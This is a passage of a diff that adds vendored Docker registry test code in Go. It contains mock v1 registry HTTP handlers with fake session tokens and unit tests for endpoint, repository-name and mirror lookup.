+				if addr.String() == host {
+					return []net.IP{addr}, nil
+				}
+			}
+		}
+		return nil, errors.New("lookup: no such host")
+	}
+}
+
+func handlerAccessLog(handler http.Handler) http.Handler {
+	logHandler := func(w http.ResponseWriter, r *http.Request) {
+		logrus.Debugf("%s \"%s %s\"", r.RemoteAddr, r.Method, r.URL)
+		handler.ServeHTTP(w, r)
+	}
+	return http.HandlerFunc(logHandler)
+}
+
+func makeURL(req string) string {
+	return testHTTPServer.URL + req
+}
+
+func makeHTTPSURL(req string) string {
+	return testHTTPSServer.URL + req
+}
+
+func makeIndex(req string) *registrytypes.IndexInfo {
+	index := &registrytypes.IndexInfo{
+		Name: makeURL(req),
+	}
+	return index
+}
+
+func makeHTTPSIndex(req string) *registrytypes.IndexInfo {
+	index := &registrytypes.IndexInfo{
+		Name: makeHTTPSURL(req),
+	}
+	return index
+}
+
+func makePublicIndex() *registrytypes.IndexInfo {
+	index := &registrytypes.IndexInfo{
+		Name:     IndexServer,
+		Secure:   true,
+		Official: true,
+	}
+	return index
+}
+
+func makeServiceConfig(mirrors []string, insecureRegistries []string) *serviceConfig {
+	options := ServiceOptions{
+		Mirrors:            mirrors,
+		InsecureRegistries: insecureRegistries,
+	}
+
+	return newServiceConfig(options)
+}
+
+func writeHeaders(w http.ResponseWriter) {
+	h := w.Header()
+	h.Add("Server", "docker-tests/mock")
+	h.Add("Expires", "-1")
+	h.Add("Content-Type", "application/json")
+	h.Add("Pragma", "no-cache")
+	h.Add("Cache-Control", "no-cache")
+	h.Add("X-Docker-Registry-Version", "0.0.0")
+	h.Add("X-Docker-Registry-Config", "mock")
+}
+
+func writeResponse(w http.ResponseWriter, message interface{}, code int) {
+	writeHeaders(w)
+	w.WriteHeader(code)
+	body, err := json.Marshal(message)
+	if err != nil {
+		io.WriteString(w, err.Error())
+		return
+	}
+	w.Write(body)
+}
+
+func readJSON(r *http.Request, dest interface{}) error {
+	body, err := ioutil.ReadAll(r.Body)
+	if err != nil {
+		return err
+	}
+	return json.Unmarshal(body, dest)
+}
+
+func apiError(w http.ResponseWriter, message string, code int) {
+	body := map[string]string{
+		"error": message,
+	}
+	writeResponse(w, body, code)
+}
+
+func assertEqual(t *testing.T, a interface{}, b interface{}, message string) {
+	if a == b {
+		return
+	}
+	if len(message) == 0 {
+		message = fmt.Sprintf("%v != %v", a, b)
+	}
+	t.Fatal(message)
+}
+
+func assertNotEqual(t *testing.T, a interface{}, b interface{}, message string) {
+	if a != b {
+		return
+	}
+	if len(message) == 0 {
+		message = fmt.Sprintf("%v == %v", a, b)
+	}
+	t.Fatal(message)
+}
+
+// Similar to assertEqual, but does not stop test
+func checkEqual(t *testing.T, a interface{}, b interface{}, messagePrefix string) {
+	if a == b {
+		return
+	}
+	message := fmt.Sprintf("%v != %v", a, b)
+	if len(messagePrefix) != 0 {
+		message = messagePrefix + ": " + message
+	}
+	t.Error(message)
+}
+
+// Similar to assertNotEqual, but does not stop test
+func checkNotEqual(t *testing.T, a interface{}, b interface{}, messagePrefix string) {
+	if a != b {
+		return
+	}
+	message := fmt.Sprintf("%v == %v", a, b)
+	if len(messagePrefix) != 0 {
+		message = messagePrefix + ": " + message
+	}
+	t.Error(message)
+}
+
+func requiresAuth(w http.ResponseWriter, r *http.Request) bool {
+	writeCookie := func() {
+		value := fmt.Sprintf("FAKE-SESSION-%d", time.Now().UnixNano())
+		cookie := &http.Cookie{Name: "session", Value: value, MaxAge: 3600}
+		http.SetCookie(w, cookie)
+		//FIXME(sam): this should be sent only on Index routes
+		value = fmt.Sprintf("FAKE-TOKEN-%d", time.Now().UnixNano())
+		w.Header().Add("X-Docker-Token", value)
+	}
+	if len(r.Cookies()) > 0 {
+		writeCookie()
+		return true
+	}
+	if len(r.Header.Get("Authorization")) > 0 {
+		writeCookie()
+		return true
+	}
+	w.Header().Add("WWW-Authenticate", "token")
+	apiError(w, "Wrong auth", 401)
+	return false
+}
+
+func handlerGetPing(w http.ResponseWriter, r *http.Request) {
+	writeResponse(w, true, 200)
+}
+
+func handlerGetImage(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	vars := mux.Vars(r)
+	layer, exists := testLayers[vars["image_id"]]
+	if !exists {
+		http.NotFound(w, r)
+		return
+	}
+	writeHeaders(w)
+	layerSize := len(layer["layer"])
+	w.Header().Add("X-Docker-Size", strconv.Itoa(layerSize))
+	io.WriteString(w, layer[vars["action"]])
+}
+
+func handlerPutImage(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	vars := mux.Vars(r)
+	imageID := vars["image_id"]
+	action := vars["action"]
+	layer, exists := testLayers[imageID]
+	if !exists {
+		if action != "json" {
+			http.NotFound(w, r)
+			return
+		}
+		layer = make(map[string]string)
+		testLayers[imageID] = layer
+	}
+	if checksum := r.Header.Get("X-Docker-Checksum"); checksum != "" {
+		if checksum != layer["checksum_simple"] && checksum != layer["checksum_tarsum"] {
+			apiError(w, "Wrong checksum", 400)
+			return
+		}
+	}
+	body, err := ioutil.ReadAll(r.Body)
+	if err != nil {
+		apiError(w, fmt.Sprintf("Error: %s", err), 500)
+		return
+	}
+	layer[action] = string(body)
+	writeResponse(w, true, 200)
+}
+
+func handlerGetDeleteTags(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	repositoryName, err := reference.WithName(mux.Vars(r)["repository"])
+	if err != nil {
+		apiError(w, "Could not parse repository", 400)
+		return
+	}
+	tags, exists := testRepositories[repositoryName.String()]
+	if !exists {
+		apiError(w, "Repository not found", 404)
+		return
+	}
+	if r.Method == "DELETE" {
+		delete(testRepositories, repositoryName.String())
+		writeResponse(w, true, 200)
+		return
+	}
+	writeResponse(w, tags, 200)
+}
+
+func handlerGetTag(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	vars := mux.Vars(r)
+	repositoryName, err := reference.WithName(vars["repository"])
+	if err != nil {
+		apiError(w, "Could not parse repository", 400)
+		return
+	}
+	tagName := vars["tag"]
+	tags, exists := testRepositories[repositoryName.String()]
+	if !exists {
+		apiError(w, "Repository not found", 404)
+		return
+	}
+	tag, exists := tags[tagName]
+	if !exists {
+		apiError(w, "Tag not found", 404)
+		return
+	}
+	writeResponse(w, tag, 200)
+}
+
+func handlerPutTag(w http.ResponseWriter, r *http.Request) {
+	if !requiresAuth(w, r) {
+		return
+	}
+	vars := mux.Vars(r)
+	repositoryName, err := reference.WithName(vars["repository"])
+	if err != nil {
+		apiError(w, "Could not parse repository", 400)
+		return
+	}
+	tagName := vars["tag"]
+	tags, exists := testRepositories[repositoryName.String()]
+	if !exists {
+		tags = make(map[string]string)
+		testRepositories[repositoryName.String()] = tags
+	}
+	tagValue := ""
+	readJSON(r, tagValue)
+	tags[tagName] = tagValue
+	writeResponse(w, true, 200)
+}
+
+func handlerUsers(w http.ResponseWriter, r *http.Request) {
+	code := 200
+	if r.Method == "POST" {
+		code = 201
+	} else if r.Method == "PUT" {
+		code = 204
+	}
+	writeResponse(w, "", code)
+}
+
+func handlerImages(w http.ResponseWriter, r *http.Request) {
+	u, _ := url.Parse(testHTTPServer.URL)
+	w.Header().Add("X-Docker-Endpoints", fmt.Sprintf("%s 	,  %s ", u.Host, "test.example.com"))
+	w.Header().Add("X-Docker-Token", fmt.Sprintf("FAKE-SESSION-%d", time.Now().UnixNano()))
+	if r.Method == "PUT" {
+		if strings.HasSuffix(r.URL.Path, "images") {
+			writeResponse(w, "", 204)
+			return
+		}
+		writeResponse(w, "", 200)
+		return
+	}
+	if r.Method == "DELETE" {
+		writeResponse(w, "", 204)
+		return
+	}
+	images := []map[string]string{}
+	for imageID, layer := range testLayers {
+		image := make(map[string]string)
+		image["id"] = imageID
+		image["checksum"] = layer["checksum_tarsum"]
+		image["Tag"] = "latest"
+		images = append(images, image)
+	}
+	writeResponse(w, images, 200)
+}
+
+func handlerAuth(w http.ResponseWriter, r *http.Request) {
+	writeResponse(w, "OK", 200)
+}
+
+func handlerSearch(w http.ResponseWriter, r *http.Request) {
+	result := &registrytypes.SearchResults{
+		Query:      "fakequery",
+		NumResults: 1,
+		Results:    []registrytypes.SearchResult{{Name: "fakeimage", StarCount: 42}},
+	}
+	writeResponse(w, result, 200)
+}
+
+func TestPing(t *testing.T) {
+	res, err := http.Get(makeURL("/v1/_ping"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, res.StatusCode, 200, "")
+	assertEqual(t, res.Header.Get("X-Docker-Registry-Config"), "mock",
+		"This is not a Mocked Registry")
+}
+
+/* Uncomment this to test Mocked Registry locally with curl
+ * WARNING: Don't push on the repos uncommented, it'll block the tests
+ *
+func TestWait(t *testing.T) {
+	logrus.Println("Test HTTP server ready and waiting:", testHTTPServer.URL)
+	c := make(chan int)
+	<-c
+}
+
+//*/
diff --git a/vendor/github.com/docker/docker/registry/registry_test.go b/vendor/github.com/docker/docker/registry/registry_test.go
new file mode 100644
index 0000000000..786dfbed40
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/registry_test.go
@@ -0,0 +1,875 @@
+// +build !solaris
+
+package registry
+
+import (
+	"fmt"
+	"net/http"
+	"net/http/httputil"
+	"net/url"
+	"strings"
+	"testing"
+
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/reference"
+)
+
+var (
+	token = []string{"fake-token"}
+)
+
+const (
+	imageID = "42d718c941f5c532ac049bf0b0ab53f0062f09a03afd4aa4a02c098e46032b9d"
+	REPO    = "foo42/bar"
+)
+
+func spawnTestRegistrySession(t *testing.T) *Session {
+	authConfig := &types.AuthConfig{}
+	endpoint, err := NewV1Endpoint(makeIndex("/v1/"), "", nil)
+	if err != nil {
+		t.Fatal(err)
+	}
+	userAgent := "docker test client"
+	var tr http.RoundTripper = debugTransport{NewTransport(nil), t.Log}
+	tr = transport.NewTransport(AuthTransport(tr, authConfig, false), DockerHeaders(userAgent, nil)...)
+	client := HTTPClient(tr)
+	r, err := NewSession(client, authConfig, endpoint)
+	if err != nil {
+		t.Fatal(err)
+	}
+	// In a normal scenario for the v1 registry, the client should send a `X-Docker-Token: true`
+	// header while authenticating, in order to retrieve a token that can be later used to
+	// perform authenticated actions.
+	//
+	// The mock v1 registry does not support that, (TODO(tiborvass): support it), instead,
+	// it will consider authenticated any request with the header `X-Docker-Token: fake-token`.
+	//
+	// Because we know that the client's transport is an `*authTransport` we simply cast it,
+	// in order to set the internal cached token to the fake token, and thus send that fake token
+	// upon every subsequent requests.
+	r.client.Transport.(*authTransport).token = token
+	return r
+}
+
+func TestPingRegistryEndpoint(t *testing.T) {
+	testPing := func(index *registrytypes.IndexInfo, expectedStandalone bool, assertMessage string) {
+		ep, err := NewV1Endpoint(index, "", nil)
+		if err != nil {
+			t.Fatal(err)
+		}
+		regInfo, err := ep.Ping()
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		assertEqual(t, regInfo.Standalone, expectedStandalone, assertMessage)
+	}
+
+	testPing(makeIndex("/v1/"), true, "Expected standalone to be true (default)")
+	testPing(makeHTTPSIndex("/v1/"), true, "Expected standalone to be true (default)")
+	testPing(makePublicIndex(), false, "Expected standalone to be false for public index")
+}
+
+func TestEndpoint(t *testing.T) {
+	// Simple wrapper to fail test if err != nil
+	expandEndpoint := func(index *registrytypes.IndexInfo) *V1Endpoint {
+		endpoint, err := NewV1Endpoint(index, "", nil)
+		if err != nil {
+			t.Fatal(err)
+		}
+		return endpoint
+	}
+
+	assertInsecureIndex := func(index *registrytypes.IndexInfo) {
+		index.Secure = true
+		_, err := NewV1Endpoint(index, "", nil)
+		assertNotEqual(t, err, nil, index.Name+": Expected error for insecure index")
+		assertEqual(t, strings.Contains(err.Error(), "insecure-registry"), true, index.Name+": Expected insecure-registry  error for insecure index")
+		index.Secure = false
+	}
+
+	assertSecureIndex := func(index *registrytypes.IndexInfo) {
+		index.Secure = true
+		_, err := NewV1Endpoint(index, "", nil)
+		assertNotEqual(t, err, nil, index.Name+": Expected cert error for secure index")
+		assertEqual(t, strings.Contains(err.Error(), "certificate signed by unknown authority"), true, index.Name+": Expected cert error for secure index")
+		index.Secure = false
+	}
+
+	index := &registrytypes.IndexInfo{}
+	index.Name = makeURL("/v1/")
+	endpoint := expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name, "Expected endpoint to be "+index.Name)
+	assertInsecureIndex(index)
+
+	index.Name = makeURL("")
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name+"/v1/", index.Name+": Expected endpoint to be "+index.Name+"/v1/")
+	assertInsecureIndex(index)
+
+	httpURL := makeURL("")
+	index.Name = strings.SplitN(httpURL, "://", 2)[1]
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), httpURL+"/v1/", index.Name+": Expected endpoint to be "+httpURL+"/v1/")
+	assertInsecureIndex(index)
+
+	index.Name = makeHTTPSURL("/v1/")
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name, "Expected endpoint to be "+index.Name)
+	assertSecureIndex(index)
+
+	index.Name = makeHTTPSURL("")
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), index.Name+"/v1/", index.Name+": Expected endpoint to be "+index.Name+"/v1/")
+	assertSecureIndex(index)
+
+	httpsURL := makeHTTPSURL("")
+	index.Name = strings.SplitN(httpsURL, "://", 2)[1]
+	endpoint = expandEndpoint(index)
+	assertEqual(t, endpoint.String(), httpsURL+"/v1/", index.Name+": Expected endpoint to be "+httpsURL+"/v1/")
+	assertSecureIndex(index)
+
+	badEndpoints := []string{
+		"http://127.0.0.1/v1/",
+		"https://127.0.0.1/v1/",
+		"http://127.0.0.1",
+		"https://127.0.0.1",
+		"127.0.0.1",
+	}
+	for _, address := range badEndpoints {
+		index.Name = address
+		_, err := NewV1Endpoint(index, "", nil)
+		checkNotEqual(t, err, nil, "Expected error while expanding bad endpoint")
+	}
+}
+
+func TestGetRemoteHistory(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	hist, err := r.GetRemoteHistory(imageID, makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, len(hist), 2, "Expected 2 images in history")
+	assertEqual(t, hist[0], imageID, "Expected "+imageID+"as first ancestry")
+	assertEqual(t, hist[1], "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+		"Unexpected second ancestry")
+}
+
+func TestLookupRemoteImage(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	err := r.LookupRemoteImage(imageID, makeURL("/v1/"))
+	assertEqual(t, err, nil, "Expected error of remote lookup to nil")
+	if err := r.LookupRemoteImage("abcdef", makeURL("/v1/")); err == nil {
+		t.Fatal("Expected error of remote lookup to not nil")
+	}
+}
+
+func TestGetRemoteImageJSON(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	json, size, err := r.GetRemoteImageJSON(imageID, makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, size, int64(154), "Expected size 154")
+	if len(json) == 0 {
+		t.Fatal("Expected non-empty json")
+	}
+
+	_, _, err = r.GetRemoteImageJSON("abcdef", makeURL("/v1/"))
+	if err == nil {
+		t.Fatal("Expected image not found error")
+	}
+}
+
+func TestGetRemoteImageLayer(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	data, err := r.GetRemoteImageLayer(imageID, makeURL("/v1/"), 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if data == nil {
+		t.Fatal("Expected non-nil data result")
+	}
+
+	_, err = r.GetRemoteImageLayer("abcdef", makeURL("/v1/"), 0)
+	if err == nil {
+		t.Fatal("Expected image not found error")
+	}
+}
+
+func TestGetRemoteTag(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	repoRef, err := reference.ParseNamed(REPO)
+	if err != nil {
+		t.Fatal(err)
+	}
+	tag, err := r.GetRemoteTag([]string{makeURL("/v1/")}, repoRef, "test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, tag, imageID, "Expected tag test to map to "+imageID)
+
+	bazRef, err := reference.ParseNamed("foo42/baz")
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = r.GetRemoteTag([]string{makeURL("/v1/")}, bazRef, "foo")
+	if err != ErrRepoNotFound {
+		t.Fatal("Expected ErrRepoNotFound error when fetching tag for bogus repo")
+	}
+}
+
+func TestGetRemoteTags(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	repoRef, err := reference.ParseNamed(REPO)
+	if err != nil {
+		t.Fatal(err)
+	}
+	tags, err := r.GetRemoteTags([]string{makeURL("/v1/")}, repoRef)
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, len(tags), 2, "Expected two tags")
+	assertEqual(t, tags["latest"], imageID, "Expected tag latest to map to "+imageID)
+	assertEqual(t, tags["test"], imageID, "Expected tag test to map to "+imageID)
+
+	bazRef, err := reference.ParseNamed("foo42/baz")
+	if err != nil {
+		t.Fatal(err)
+	}
+	_, err = r.GetRemoteTags([]string{makeURL("/v1/")}, bazRef)
+	if err != ErrRepoNotFound {
+		t.Fatal("Expected ErrRepoNotFound error when fetching tags for bogus repo")
+	}
+}
+
+func TestGetRepositoryData(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	parsedURL, err := url.Parse(makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	host := "http://" + parsedURL.Host + "/v1/"
+	repoRef, err := reference.ParseNamed(REPO)
+	if err != nil {
+		t.Fatal(err)
+	}
+	data, err := r.GetRepositoryData(repoRef)
+	if err != nil {
+		t.Fatal(err)
+	}
+	assertEqual(t, len(data.ImgList), 2, "Expected 2 images in ImgList")
+	assertEqual(t, len(data.Endpoints), 2,
+		fmt.Sprintf("Expected 2 endpoints in Endpoints, found %d instead", len(data.Endpoints)))
+	assertEqual(t, data.Endpoints[0], host,
+		fmt.Sprintf("Expected first endpoint to be %s but found %s instead", host, data.Endpoints[0]))
+	assertEqual(t, data.Endpoints[1], "http://test.example.com/v1/",
+		fmt.Sprintf("Expected first endpoint to be http://test.example.com/v1/ but found %s instead", data.Endpoints[1]))
+
+}
+
+func TestPushImageJSONRegistry(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	imgData := &ImgData{
+		ID:       "77dbf71da1d00e3fbddc480176eac8994025630c6590d11cfc8fe1209c2a1d20",
+		Checksum: "sha256:1ac330d56e05eef6d438586545ceff7550d3bdcb6b19961f12c5ba714ee1bb37",
+	}
+
+	err := r.PushImageJSONRegistry(imgData, []byte{0x42, 0xdf, 0x0}, makeURL("/v1/"))
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestPushImageLayerRegistry(t *testing.T) {
+	r := spawnTestRegistrySession(t)
+	layer := strings.NewReader("")
+	_, _, err := r.PushImageLayerRegistry(imageID, layer, makeURL("/v1/"), []byte{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestParseRepositoryInfo(t *testing.T) {
+	type staticRepositoryInfo struct {
+		Index         *registrytypes.IndexInfo
+		RemoteName    string
+		CanonicalName string
+		LocalName     string
+		Official      bool
+	}
+
+	expectedRepoInfos := map[string]staticRepositoryInfo{
+		"fooo/bar": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "fooo/bar",
+			LocalName:     "fooo/bar",
+			CanonicalName: "docker.io/fooo/bar",
+			Official:      false,
+		},
+		"library/ubuntu": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "library/ubuntu",
+			LocalName:     "ubuntu",
+			CanonicalName: "docker.io/library/ubuntu",
+			Official:      true,
+		},
+		"nonlibrary/ubuntu": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "nonlibrary/ubuntu",
+			LocalName:     "nonlibrary/ubuntu",
+			CanonicalName: "docker.io/nonlibrary/ubuntu",
+			Official:      false,
+		},
+		"ubuntu": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "library/ubuntu",
+			LocalName:     "ubuntu",
+			CanonicalName: "docker.io/library/ubuntu",
+			Official:      true,
+		},
+		"other/library": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "other/library",
+			LocalName:     "other/library",
+			CanonicalName: "docker.io/other/library",
+			Official:      false,
+		},
+		"127.0.0.1:8000/private/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "127.0.0.1:8000",
+				Official: false,
+			},
+			RemoteName:    "private/moonbase",
+			LocalName:     "127.0.0.1:8000/private/moonbase",
+			CanonicalName: "127.0.0.1:8000/private/moonbase",
+			Official:      false,
+		},
+		"127.0.0.1:8000/privatebase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "127.0.0.1:8000",
+				Official: false,
+			},
+			RemoteName:    "privatebase",
+			LocalName:     "127.0.0.1:8000/privatebase",
+			CanonicalName: "127.0.0.1:8000/privatebase",
+			Official:      false,
+		},
+		"localhost:8000/private/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "localhost:8000",
+				Official: false,
+			},
+			RemoteName:    "private/moonbase",
+			LocalName:     "localhost:8000/private/moonbase",
+			CanonicalName: "localhost:8000/private/moonbase",
+			Official:      false,
+		},
+		"localhost:8000/privatebase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "localhost:8000",
+				Official: false,
+			},
+			RemoteName:    "privatebase",
+			LocalName:     "localhost:8000/privatebase",
+			CanonicalName: "localhost:8000/privatebase",
+			Official:      false,
+		},
+		"example.com/private/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "example.com",
+				Official: false,
+			},
+			RemoteName:    "private/moonbase",
+			LocalName:     "example.com/private/moonbase",
+			CanonicalName: "example.com/private/moonbase",
+			Official:      false,
+		},
+		"example.com/privatebase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "example.com",
+				Official: false,
+			},
+			RemoteName:    "privatebase",
+			LocalName:     "example.com/privatebase",
+			CanonicalName: "example.com/privatebase",
+			Official:      false,
+		},
+		"example.com:8000/private/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "example.com:8000",
+				Official: false,
+			},
+			RemoteName:    "private/moonbase",
+			LocalName:     "example.com:8000/private/moonbase",
+			CanonicalName: "example.com:8000/private/moonbase",
+			Official:      false,
+		},
+		"example.com:8000/privatebase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "example.com:8000",
+				Official: false,
+			},
+			RemoteName:    "privatebase",
+			LocalName:     "example.com:8000/privatebase",
+			CanonicalName: "example.com:8000/privatebase",
+			Official:      false,
+		},
+		"localhost/private/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "localhost",
+				Official: false,
+			},
+			RemoteName:    "private/moonbase",
+			LocalName:     "localhost/private/moonbase",
+			CanonicalName: "localhost/private/moonbase",
+			Official:      false,
+		},
+		"localhost/privatebase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     "localhost",
+				Official: false,
+			},
+			RemoteName:    "privatebase",
+			LocalName:     "localhost/privatebase",
+			CanonicalName: "localhost/privatebase",
+			Official:      false,
+		},
+		IndexName + "/public/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "public/moonbase",
+			LocalName:     "public/moonbase",
+			CanonicalName: "docker.io/public/moonbase",
+			Official:      false,
+		},
+		"index." + IndexName + "/public/moonbase": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "public/moonbase",
+			LocalName:     "public/moonbase",
+			CanonicalName: "docker.io/public/moonbase",
+			Official:      false,
+		},
+		"ubuntu-12.04-base": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "library/ubuntu-12.04-base",
+			LocalName:     "ubuntu-12.04-base",
+			CanonicalName: "docker.io/library/ubuntu-12.04-base",
+			Official:      true,
+		},
+		IndexName + "/ubuntu-12.04-base": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "library/ubuntu-12.04-base",
+			LocalName:     "ubuntu-12.04-base",
+			CanonicalName: "docker.io/library/ubuntu-12.04-base",
+			Official:      true,
+		},
+		"index." + IndexName + "/ubuntu-12.04-base": {
+			Index: &registrytypes.IndexInfo{
+				Name:     IndexName,
+				Official: true,
+			},
+			RemoteName:    "library/ubuntu-12.04-base",
+			LocalName:     "ubuntu-12.04-base",
+			CanonicalName: "docker.io/library/ubuntu-12.04-base",
+			Official:      true,
+		},
+	}
+
+	for reposName, expectedRepoInfo := range expectedRepoInfos {
+		named, err := reference.WithName(reposName)
+		if err != nil {
+			t.Error(err)
+		}
+
+		repoInfo, err := ParseRepositoryInfo(named)
+		if err != nil {
+			t.Error(err)
+		} else {
+			checkEqual(t, repoInfo.Index.Name, expectedRepoInfo.Index.Name, reposName)
+			checkEqual(t, repoInfo.RemoteName(), expectedRepoInfo.RemoteName, reposName)
+			checkEqual(t, repoInfo.Name(), expectedRepoInfo.LocalName, reposName)
+			checkEqual(t, repoInfo.FullName(), expectedRepoInfo.CanonicalName, reposName)
+			checkEqual(t, repoInfo.Index.Official, expectedRepoInfo.Index.Official, reposName)
+			checkEqual(t, repoInfo.Official, expectedRepoInfo.Official, reposName)
+		}
+	}
+}
+
+func TestNewIndexInfo(t *testing.T) {
+	testIndexInfo := func(config *serviceConfig, expectedIndexInfos map[string]*registrytypes.IndexInfo) {
+		for indexName, expectedIndexInfo := range expectedIndexInfos {
+			index, err := newIndexInfo(config, indexName)
+			if err != nil {
+				t.Fatal(err)
+			} else {
+				checkEqual(t, index.Name, expectedIndexInfo.Name, indexName+" name")
+				checkEqual(t, index.Official, expectedIndexInfo.Official, indexName+" is official")
+				checkEqual(t, index.Secure, expectedIndexInfo.Secure, indexName+" is secure")
+				checkEqual(t, len(index.Mirrors), len(expectedIndexInfo.Mirrors), indexName+" mirrors")
+			}
+		}
+	}
+
+	config := newServiceConfig(ServiceOptions{})
+	noMirrors := []string{}
+	expectedIndexInfos := map[string]*registrytypes.IndexInfo{
+		IndexName: {
+			Name:     IndexName,
+			Official: true,
+			Secure:   true,
+			Mirrors:  noMirrors,
+		},
+		"index." + IndexName: {
+			Name:     IndexName,
+			Official: true,
+			Secure:   true,
+			Mirrors:  noMirrors,
+		},
+		"example.com": {
+			Name:     "example.com",
+			Official: false,
+			Secure:   true,
+			Mirrors:  noMirrors,
+		},
+		"127.0.0.1:5000": {
+			Name:     "127.0.0.1:5000",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+	}
+	testIndexInfo(config, expectedIndexInfos)
+
+	publicMirrors := []string{"http://mirror1.local", "http://mirror2.local"}
+	config = makeServiceConfig(publicMirrors, []string{"example.com"})
+
+	expectedIndexInfos = map[string]*registrytypes.IndexInfo{
+		IndexName: {
+			Name:     IndexName,
+			Official: true,
+			Secure:   true,
+			Mirrors:  publicMirrors,
+		},
+		"index." + IndexName: {
+			Name:     IndexName,
+			Official: true,
+			Secure:   true,
+			Mirrors:  publicMirrors,
+		},
+		"example.com": {
+			Name:     "example.com",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"example.com:5000": {
+			Name:     "example.com:5000",
+			Official: false,
+			Secure:   true,
+			Mirrors:  noMirrors,
+		},
+		"127.0.0.1": {
+			Name:     "127.0.0.1",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"127.0.0.1:5000": {
+			Name:     "127.0.0.1:5000",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"other.com": {
+			Name:     "other.com",
+			Official: false,
+			Secure:   true,
+			Mirrors:  noMirrors,
+		},
+	}
+	testIndexInfo(config, expectedIndexInfos)
+
+	config = makeServiceConfig(nil, []string{"42.42.0.0/16"})
+	expectedIndexInfos = map[string]*registrytypes.IndexInfo{
+		"example.com": {
+			Name:     "example.com",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"example.com:5000": {
+			Name:     "example.com:5000",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"127.0.0.1": {
+			Name:     "127.0.0.1",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"127.0.0.1:5000": {
+			Name:     "127.0.0.1:5000",
+			Official: false,
+			Secure:   false,
+			Mirrors:  noMirrors,
+		},
+		"other.com": {
+			Name:     "other.com",
+			Official: false,
+			Secure:   true,
+			Mirrors:  noMirrors,
+		},
+	}
+	testIndexInfo(config, expectedIndexInfos)
+}
+
+func TestMirrorEndpointLookup(t *testing.T) {
+	containsMirror := func(endpoints []APIEndpoint) bool {
+		for _, pe := range endpoints {
+			if pe.URL.Host == "my.mirror" {
+				return true
+			}
+		}
+		return false
+	}
+	s := DefaultService{config: makeServiceConfig([]string{"my.mirror"}, nil)}
+
+	imageName, err := reference.WithName(IndexName + "/test/image")
+	if err != nil {
+		t.Error(err)
+	}
+	pushAPIEndpoints, err := s.LookupPushEndpoints(imageName.Hostname())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if containsMirror(pushAPIEndpoints) {
+		t.Fatal("Push endpoint should not contain mirror")
+	}
+
+	pullAPIEndpoints, err := s.LookupPullEndpoints(imageName.Hostname())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !containsMirror(pullAPIEndpoints) {
